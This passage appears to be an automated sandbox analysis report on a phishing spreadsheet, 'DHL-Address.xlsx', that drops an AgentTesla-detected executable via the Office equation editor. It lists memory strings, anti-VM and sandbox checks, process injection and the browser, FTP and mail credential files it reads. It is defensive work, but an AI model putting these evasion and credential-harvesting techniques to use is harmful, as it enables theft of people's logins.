              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
              Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
              Source: vbc.exe, 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
              Source: vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
              Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
              Source: vbc.exe, 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmpString found in binary or memory: https://jUxNbkiTmoSYxyvoDh.net
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
              Source: vbc.exe, 00000004.00000002.2165947138.0000000003519000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
              Source: C:\Users\Public\vbc.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              System Summary:

              barindex
              Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
              Source: Screenshot number: 4Screenshot OCR: document is protected 16 17 " t9 19 20 21 Open the doCument In If this document was 22 Micros
              Source: Screenshot number: 4Screenshot OCR: protected documents the yellow bar above 25 26 27 28 29 30 31 0 0 32 33 0 0 34 35 0 0
              .NET source code contains very large array initializationsShow sources
              Source: 5.2.vbc.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b49EBC49Du002dB1B3u002d4ED6u002dA41Au002d329378617F94u007d/u0031A3AC0E6u002d0D4Cu002d475Fu002dB7A0u002dA416DBBA91DC.csLarge array initialization: .cctor: array initializer size 11960
              Office equation editor drops PE fileShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 4_2_001D22C24_2_001D22C2
              Source: C:\Users\Public\vbc.exeCode function: 4_2_001D2A984_2_001D2A98
              Source: C:\Users\Public\vbc.exeCode function: 4_2_001D75B84_2_001D75B8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_001D75C84_2_001D75C8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_001D27374_2_001D2737
              Source: C:\Users\Public\vbc.exeCode function: 4_2_001D27484_2_001D2748
              Source: C:\Users\Public\vbc.exeCode function: 4_2_001DD8184_2_001DD818
              Source: C:\Users\Public\vbc.exeCode function: 4_2_001D2A884_2_001D2A88
              Source: C:\Users\Public\vbc.exeCode function: 5_2_002D60A85_2_002D60A8
              Source: C:\Users\Public\vbc.exeCode function: 5_2_002D54905_2_002D5490
              Source: C:\Users\Public\vbc.exeCode function: 5_2_002DDA905_2_002DDA90
              Source: C:\Users\Public\vbc.exeCode function: 5_2_002D21E75_2_002D21E7
              Source: C:\Users\Public\vbc.exeCode function: 5_2_002D57D85_2_002D57D8
              Source: C:\Users\Public\vbc.exeCode function: 5_2_002DF8085_2_002DF808
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0058F0D85_2_0058F0D8
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0058CB605_2_0058CB60
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00583F305_2_00583F30
              Source: C:\Users\Public\vbc.exeCode function: 5_2_005873F05_2_005873F0
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0058B8485_2_0058B848
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0058A0205_2_0058A020
              Source: C:\Users\Public\vbc.exeCode function: 5_2_005826B85_2_005826B8
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00587B005_2_00587B00
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00581B385_2_00581B38
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0058A7905_2_0058A790
              Source: 5.2.vbc.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 5.2.vbc.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/10@5/2
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$DHL-Address.xlsxJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE723.tmpJump to behavior
              Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: DHL-Address.xlsxVirustotal: Detection: 47%
              Source: DHL-Address.xlsxReversingLabs: Detection: 48%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: DHL-Address.xlsxInitial sample: OLE zip file path = xl/media/image2.emf
              Source: DHL-Address.xlsxInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
              Source: DHL-Address.xlsxInitial sample: OLE zip file path = xl/drawings/_rels/vmlDrawing2.vml.rels
              Source: DHL-Address.xlsxInitial sample: OLE zip file path = xl/drawings/vmlDrawing2.vml
              Source: DHL-Address.xlsxInitial sample: OLE zip file path = xl/embeddings/oleObject1.bin
              Source: DHL-Address.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: DHL-Address.xlsxInitial sample: OLE indicators vbamacros = False

              Data Obfuscation:

              barindex
              .NET source code contains potential unpackerShow sources
              Source: vbc[1].exe.2.dr, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.2.vbc.exe.1030000.2.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.0.vbc.exe.1030000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.vbc.exe.1030000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.2.vbc.exe.1030000.4.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\Public\vbc.exeCode function: 5_2_005816C2 push eax; ret 5_2_005816C9
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00582290 push esp; retf 002Ch5_2_00582291
              Source: C:\Users\Public\vbc.exeCode function: 5_2_005803B5 push FFFFFFE8h; ret 5_2_005803C2
              Source: initial sampleStatic PE information: section name: .text entropy: 7.3067407255
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the user root directoryShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Users\Public\vbc.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: DHL-Address.xlsxStream path '\x1oLe10NatIve' entropy: 7.99509276826 (max. 8.0)

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM_3Show sources
              Source: Yara matchFile source: 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1616, type: MEMORY
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
              Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 9602Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2296Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Users\Public\vbc.exe TID: 2880Thread sleep time: -49517s >= -30000sJump to behavior
              Source: C:\Users\Public\vbc.exe TID: 2868Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\Public\vbc.exe TID: 3028Thread sleep time: -300000s >= -30000sJump to behavior
              Source: C:\Users\Public\vbc.exe TID: 2244Thread sleep time: -8301034833169293s >= -30000sJump to behavior
              Source: C:\Users\Public\vbc.exe TID: 2244Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Users\Public\vbc.exe TID: 2240Thread sleep count: 9602 > 30Jump to behavior
              Source: C:\Users\Public\vbc.exe TID: 2240Thread sleep count: 138 > 30Jump to behavior
              Source: C:\Users\Public\vbc.exe TID: 2244Thread sleep count: 95 > 30Jump to behavior
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: vbc.exe, 00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
              Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
              Source: vbc.exe, 00000005.00000002.2360311153.0000000001110000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: vbc.exe, 00000005.00000002.2360311153.0000000001110000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: vbc.exe, 00000005.00000002.2360311153.0000000001110000.00000002.00000001.sdmpBinary or memory string: !Progman
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2165947138.0000000003519000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1616, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 552, type: MEMORY
              Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Yara matchFile source: 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 552, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2165947138.0000000003519000.00000004.00000001.sdmp, type: MEMORY
